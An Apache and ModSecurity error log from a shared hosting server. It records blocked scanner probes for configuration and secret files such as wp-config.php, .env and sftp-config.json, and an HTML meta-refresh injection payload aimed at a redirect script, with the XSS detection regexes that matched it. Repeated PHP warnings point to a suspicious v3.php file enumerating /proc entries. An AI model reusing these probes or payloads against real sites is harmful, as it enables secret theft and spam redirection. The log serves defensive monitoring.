[Mon May 11 12:10:54.605358 2026] [authz_core:error] [pid 1256241:tid 1256270] [client 95.111.239.37:61492] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log, referer: binance.com
[Mon May 11 12:10:54.849953 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:38870] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /modules/wp-config.php.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/modules/wp-config.php.rc1"] [unique_id "agGrLhjZymfuKpjWXeiD0AAAAMQ"]
[Mon May 11 12:10:54.851728 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:38870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/modules/wp-config.php.rc1"] [unique_id "agGrLhjZymfuKpjWXeiD0AAAAMQ"]
[Mon May 11 12:10:57.046249 2026] [security2:error] [pid 1254133:tid 1254140] [client 185.177.72.9:38870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrLhjZymfuKpjWXeiD0AAAAMQ"]
[Mon May 11 12:10:57.072494 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:38886] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /modules/wp-config.php.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/modules/wp-config.php.rc1"] [unique_id "agGrMZkIEwRJMyDaV55U3AAAAVI"]
[Mon May 11 12:10:57.073007 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:38886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/modules/wp-config.php.rc1"] [unique_id "agGrMZkIEwRJMyDaV55U3AAAAVI"]
[Mon May 11 12:10:58.292679 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:38886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrMZkIEwRJMyDaV55U3AAAAVI"]
[Mon May 11 12:11:03.287313 2026] [authz_core:error] [pid 1254212:tid 1254237] [client 95.111.239.37:64525] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 12:11:09.730013 2026] [authz_core:error] [pid 1254179:tid 1254205] [client 95.111.239.37:50612] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/IXR/error_log, referer: binance.com
[Mon May 11 12:11:18.339113 2026] [authz_core:error] [pid 1254179:tid 1254197] [client 95.111.239.37:53435] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/PHPMailer/error_log, referer: binance.com
[Mon May 11 12:11:26.462663 2026] [authz_core:error] [pid 1256241:tid 1256259] [client 95.111.239.37:56311] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/PHPMailer/error_log, referer: binance.com
[Mon May 11 12:11:29.162878 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:21604] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /netlify/web.config.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/netlify/web.config.inactive"] [unique_id "agGrURjZymfuKpjWXeiD-wAAANM"]
[Mon May 11 12:11:29.163257 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/netlify/web.config.inactive"] [unique_id "agGrURjZymfuKpjWXeiD-wAAANM"]
[Mon May 11 12:11:30.310492 2026] [security2:error] [pid 1254133:tid 1254155] [client 185.177.72.9:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrURjZymfuKpjWXeiD-wAAANM"]
[Mon May 11 12:11:30.336010 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:21614] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /netlify/web.config.inactive"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/netlify/web.config.inactive"] [unique_id "agGrUkRdw2n9wv6Ai48OPAAAAJM"]
[Mon May 11 12:11:30.336227 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:21614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/netlify/web.config.inactive"] [unique_id "agGrUkRdw2n9wv6Ai48OPAAAAJM"]
[Mon May 11 12:11:31.532435 2026] [security2:error] [pid 1254328:tid 1254349] [client 185.177.72.9:21614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrUkRdw2n9wv6Ai48OPAAAAJM"]
PHP Warning:  filesize(): stat failed for /proc/696/task/696/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/696/task/696/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/696/task/696/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/696/task/696/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/696/task/696/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/696/task/696/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 12:11:38.805785 2026] [authz_core:error] [pid 1254133:tid 1254144] [client 216.73.216.110:27693] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/openid/error_log
PHP Warning:  filesize(): stat failed for /proc/688/task/688/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/688/task/688/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/688/task/688/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/688/task/688/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/688/task/688/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/688/task/688/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/242/task/242/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/242/task/242/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/242/task/242/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/242/task/242/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/242/task/242/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/242/task/242/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 12:12:02.048853 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:58098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env.docker._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/node_modules/.env.docker._"] [unique_id "agGrckRdw2n9wv6Ai48OXgAAAIM"]
[Mon May 11 12:12:02.049305 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:58098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/node_modules/.env.docker._"] [unique_id "agGrckRdw2n9wv6Ai48OXgAAAIM"]
[Mon May 11 12:12:04.821137 2026] [security2:error] [pid 1254328:tid 1254334] [client 185.177.72.9:58098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrckRdw2n9wv6Ai48OXgAAAIM"]
[Mon May 11 12:12:04.847028 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:62836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env.docker._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/node_modules/.env.docker._"] [unique_id "agGrdERdw2n9wv6Ai48OYAAAAIk"]
[Mon May 11 12:12:04.848658 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:62836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/node_modules/.env.docker._"] [unique_id "agGrdERdw2n9wv6Ai48OYAAAAIk"]
[Mon May 11 12:12:07.090578 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:62836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrdERdw2n9wv6Ai48OYAAAAIk"]
PHP Warning:  filesize(): stat failed for /proc/197/task/197/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/197/task/197/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/197/task/197/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/197/task/197/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/197/task/197/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/197/task/197/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/240/task/240/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/240/task/240/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/240/task/240/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/240/task/240/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/240/task/240/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/240/task/240/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 12:12:37.969770 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:54612] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /opt/sftp-config.json.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/opt/sftp-config.json.template"] [unique_id "agGrlURdw2n9wv6Ai48OhQAAAJg"]
[Mon May 11 12:12:37.973599 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:54612] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/opt/sftp-config.json.template"] [unique_id "agGrlURdw2n9wv6Ai48OhQAAAJg"]
[Mon May 11 12:12:39.136138 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:54612] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrlURdw2n9wv6Ai48OhQAAAJg"]
[Mon May 11 12:12:39.190214 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:54622] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /opt/sftp-config.json.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/opt/sftp-config.json.template"] [unique_id "agGrl0YQeUtAPynIs6xgHwAAAAM"]
[Mon May 11 12:12:39.190725 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:54622] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/opt/sftp-config.json.template"] [unique_id "agGrl0YQeUtAPynIs6xgHwAAAAM"]
[Mon May 11 12:12:40.400032 2026] [security2:error] [pid 1254212:tid 1254217] [client 185.177.72.9:54622] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrl0YQeUtAPynIs6xgHwAAAAM"]
[Mon May 11 12:12:47.549886 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://jkjl.d8.9.adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://ykm.de/student-aid-80028>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://ykm.de/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
[Mon May 11 12:12:47.550754 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
[Mon May 11 12:12:47.551183 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
[Mon May 11 12:12:47.551464 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
